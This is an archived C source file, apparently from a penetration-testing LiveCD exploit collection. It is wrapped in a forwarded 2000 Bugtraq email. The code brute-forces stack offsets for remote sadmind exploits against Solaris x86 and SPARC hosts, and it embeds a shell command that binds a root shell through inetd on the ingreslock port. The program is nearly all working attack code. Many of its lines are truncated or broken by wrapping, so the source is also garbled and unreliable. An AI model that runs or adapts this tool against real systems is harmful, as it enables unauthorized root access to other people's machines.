home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / sadmind-brute.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  10KB  |  304 lines

---

1. From aleph1@SECURITYFOCUS.COM Fri Nov 10 12:43:31 2000
2. Date: Fri, 10 Nov 2000 09:50:50 -0800
3. From: Elias Levy <aleph1@SECURITYFOCUS.COM>
4. To: vuldb@securityfocus.com
5. Subject: (forw) BUGTRAQ: approval required (2C2CCEC7)
6.  
7.  
8. -- 
9. Elias Levy
10. SecurityFocus.com
11. http://www.securityfocus.com/
12. Si vis pacem, para bellum
13.  
14.     [ Part 2: "Included Message" ]
15.  
16. Date: Fri, 10 Nov 2000 04:35:43 -0800
17. From: "L-Soft list server at SecurityFocus.com (1.8d)"
18.     <LISTSERV@LISTS.SECURITYFOCUS.COM>
19. To: Elias Levy <aleph1@SECURITYFOCUS.COM>
20. Subject: BUGTRAQ: approval required (2C2CCEC7)
21.  
22. This message was originally submitted by root@SECURITYFOCUS.COM to the BUGTRAQ
23. list at LISTS.SECURITYFOCUS.COM. You can  approve it using the "OK" mechanism,
24. ignore it, or repost an edited copy. The message will expire automatically and
25. you do not need to do anything if you just want to discard it. Please refer to
26. the list owner's guide if you are  not familiar with the "OK" mechanism; these
27. instructions  are  being  kept  purposefully short  for  your  convenience  in
28. processing large numbers of messages.
29.  
30. ----------------- Original message (ID=2C2CCEC7) (274 lines) ------------------
31. Return-Path: <owner-bugtraq@securityfocus.com>
32. Delivered-To: bugtraq@lists.securityfocus.com
33. Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78])
34.     by lists.securityfocus.com (Postfix) with SMTP id 8431D24C489
35.     for <bugtraq@lists.securityfocus.com>; Fri, 10 Nov 2000 04:35:43 -0800 (PST)
36. Received: (qmail 22921 invoked by alias); 10 Nov 2000 12:38:11 -0000
37. Delivered-To: bugtraq@securityfocus.com
38. Received: (qmail 22918 invoked from network); 10 Nov 2000 12:38:11 -0000
39. Received: from www3.securityfocus.com (HELO securityfocus.com) (207.126.127.74)
40.   by mail.securityfocus.com with SMTP; 10 Nov 2000 12:38:11 -0000
41. Received: (qmail 6375 invoked by uid 103); 10 Nov 2000 12:34:52 -0000
42. Date: 10 Nov 2000 12:34:52 -0000
43. Message-ID: <20001110123452.6374.qmail@securityfocus.com>
44. From: nikolai abromov <minix@antionline.org>
45. To: bugtraq@securityfocus.com
46. X-Mailer: Security Focus
47. Subject: Re: sadmind exploits (remote sparc/x86)
48. Sender: root@securityfocus.com
49.  
50.  
51. brute force offset .... 
52.  
53.  
54.  
55.  
56. // *** Synnergy Networks
57.  
58. #include <stdio.h>
59. #include <stdlib.h>
60. #include <signal.h>
61. #include <string.h>
62. #include <sys/errno.h>
63. #include <sys/types.h>
64. #include <sys/socket.h>
65. #include <sys/stat.h>
66. #include <fcntl.h>
67. #include <netinet/in.h>
68. #include <netdb.h>
69. #include <unistd.h>
70.  
71. /* *** ATTENTION *** you may have to change some
72. of these *** ATTENTION *** */
73. #define EXPX86          "sadmindex-x86"  /*
74. sadmind exploit for x86 arch */
75. #define EXPSPARC        "sadmindex-sparc"  /*
76. sadmind exploit for sparc arch */
77. #define INC             4  /* sp brute forcing
78. incrementation - 4 should be ok
79.  
80. /* DON'T change the following */
81. #define FALSE           0  /* false */
82. #define TRUE            !FALSE  /* true */
83. #define BINDINGRES      "echo 'ingreslock stream
84. tcp nowait root /bin/sh sh -i'
85.                                         > /tmp/.x;
86. /usr/sbin/inetd -s /tmp/.x;
87.                                         m -f
88. /tmp/.x;"  /* bind rootshell */
89. #define SPX8626         0x080418ec  /* default
90. sadmindex sp for x86 2.6 */
91. #define SPX867          0x08041798  /* default
92. sadmindex sp for x86 7.0 */
93. #define SPSPARC26       0xefff9580  /* default
94. sadmindex sp for sparc 2.6 */
95. #define SPSPARC7        0xefff9418  /* default
96. sadmindex sp for sparc 7.0 */
97. #define EXPCMDX8626     "./%s -h %s -c \"%s\" -s
98. 0x%x -j 512\n"  /* cmd line */
99. #define EXPCMDX867      "./%s -h %s -c \"%s\" -s
100. 0x%x -j 536\n"  /* cmd line */
101. #define EXPCMDSPARC     "./%s -h %s -c \"%s\" -s
102. 0x%x\n"  /* cmd line */
103.  
104. int
105. main(int argc, char **argv)
106. {
107.         int i, sockfd, fd, size = 4096, sign = -1;
108.         long int addr;
109.         char *buffer = (char *) malloc (size);
110.         struct hostent *he;
111.         struct sockaddr_in their_addr;
112.         if (argc < 3)
113.         {
114.                 fprintf(stderr, "\nsadmindex sp
115. brute forcer - by elux\n");
116.                 fprintf(stderr, "usage: %s [arch]
117. <host>\n\n", argv[0]);
118.                 fprintf(stderr, "\tarch:\n");
119.                 fprintf(stderr, "\t1 - x86 Solaris
120. 2.6\n");
121.                 fprintf(stderr, "\t2 - x86 Solaris
122. 7.0\n");
123.                 fprintf(stderr, "\t3 - SPARC
124. Solaris 2.6\n");
125.                 fprintf(stderr, "\t4 - SPARC
126. Solaris 7.0\n\n");
127.                 exit(TRUE);
128.         }
129.  
130.         if ( (he = gethostbyname(argv[2])) ==
131. NULL)
132.         {
133.                 printf("Unable to resolve %s\n",
134. argv[2]);
135.                 exit(TRUE);
136.         }
137.  
138.         their_addr.sin_family = AF_INET;
139.         their_addr.sin_port = htons(1524);
140.         their_addr.sin_addr = *((struct in_addr
141. *)he->h_addr);
142.         bzero(&(their_addr.sin_zero), 8);
143.  
144.      if ( (strcmp(argv[1], "1")) == 0)
145.         {
146.                 addr = SPX8626;
147.                 printf("\nAlright... sit back and
148. relax while this program brut
149.                 for (i = 0; i <= 4096; i += INC)
150.                 {
151.                         if ( (sockfd =
152. socket(AF_INET, SOCK_STREAM, 0)) != -1)
153.                         {
154.                                 if (
155. (connect(sockfd, (struct sockaddr *)&their
156.                                 {
157.                                        
158. fprintf(stderr, "\n\nNow telnet to %s,
159.                                        
160. close(sockfd);
161.                                        
162. exit(FALSE);
163.                                 }
164.                         }
165.                         if ( (fd = open(EXPX86,
166. O_RDONLY)) != -1)
167.                         {
168.                                 sign *= -1;
169.                                 addr -= i *sign;
170.                                 snprintf(buffer,
171. size, EXPCMDX8626, EXPX86, arg
172.                                 system(buffer);
173.                         }
174.                         else
175.                    {
176.                                 printf("\n\n%s
177. doesn't exisit, you need the sad
178.                                 exit(TRUE);
179.                         }
180.                 }
181.         }
182.         else if ( (strcmp(argv[1], "2")) == 0)
183.         {
184.                 addr = SPX867;
185.                 printf("\nAlright... sit back and
186. relax while this program brut
187.                 for (i = 0; i <= 4096; i += INC)
188.                 {
189.                         if ( (sockfd =
190. socket(AF_INET, SOCK_STREAM, 0)) != -1)
191.                         {
192.                                 if (
193. (connect(sockfd, (struct sockaddr *)&their
194.                                 {
195.                                        
196. fprintf(stderr, "\n\nNow telnet to %s,
197.                                        
198. close(sockfd);
199.                                        
200. exit(FALSE);
201.                                 }
202.                         }
203.                         if ( (fd = open(EXPX86,
204. O_RDONLY)) != -1)
205.                         {
206.  
207.  
208.                              sign *= -1;
209.                                 addr -= i *sign;
210.                                 snprintf(buffer,
211. size, EXPCMDX867, EXPX86, argv
212.                                 system(buffer);
213.                         }
214.                         else
215.                         {
216.                                 printf("\n\n%s
217. doesn't exisit, you need the sad
218.                                 exit(TRUE);
219.                         }
220.                 }
221.         }
222.         else if ( (strcmp(argv[1], "3")) == 0)
223.         {
224.                 addr = SPSPARC26;
225.                 printf("\nAlright... sit back and
226. relax while this program brut
227.                 for (i = 0; i <= 4096; i += INC)
228.                 {
229.                         if ( (sockfd =
230. socket(AF_INET, SOCK_STREAM, 0)) != -1)
231.                         {
232.                                 if (
233. (connect(sockfd, (struct sockaddr *)&their
234.                                 {
235.                                        
236. fprintf(stderr, "\n\nNow telnet to %s,
237.                           close(sockfd);
238.                                        
239. exit(FALSE);
240.                                 }
241.                         }
242.                         if ( (fd = open(EXPSPARC,
243. O_RDONLY)) != -1)
244.                         {
245.                                 sign *= -1;
246.                                 addr -= i *sign;
247.                                 snprintf(buffer,
248. size, EXPCMDSPARC, EXPSPARC, a
249.                                 system(buffer);
250.                         }
251.                         else
252.                         {
253.                                 printf("\n\n%s
254. doesn't exisit, you need the sad
255.                                 exit(TRUE);
256.                         }
257.                 }
258.         }
259.         else if ( (strcmp(argv[1], "4")) == 0)
260.         {
261.                 addr = SPSPARC7;   
262.                 printf("\nAlright... sit back and
263. relax while this program brut
264.                 for (i = 0; i <= 4096; i += INC)
265.      {
266.                         if ( (sockfd =
267. socket(AF_INET, SOCK_STREAM, 0)) != -1)
268.                         {
269.                                 if (
270. (connect(sockfd, (struct sockaddr *)&their
271.                                 {  
272.                                        
273. fprintf(stderr, "\n\nNow telnet to %s,
274.                                        
275. close(sockfd);
276.                                        
277. exit(FALSE);
278.                                 }  
279.                         }
280.                         if ( (fd = open(EXPSPARC,
281. O_RDONLY)) != -1)
282.                         {
283.                                 sign *= -1;
284.                                 addr -= i *sign;
285.                                 snprintf(buffer,
286. size, EXPCMDSPARC, EXPSPARC, a
287.                                 system(buffer);
288.                         }
289.                         else
290.                         {
291.                                 printf("\n\n%s
292. doesn't exisit, you need the sad
293.                                 exit(TRUE);
294.                         }
295.                 }
296.  
297.         }
298.         else
299.                 printf("%s is not a supported
300. arch, try 1 - 4 ... .. .\n", argv
301. }
302.  
303. // EOF
304.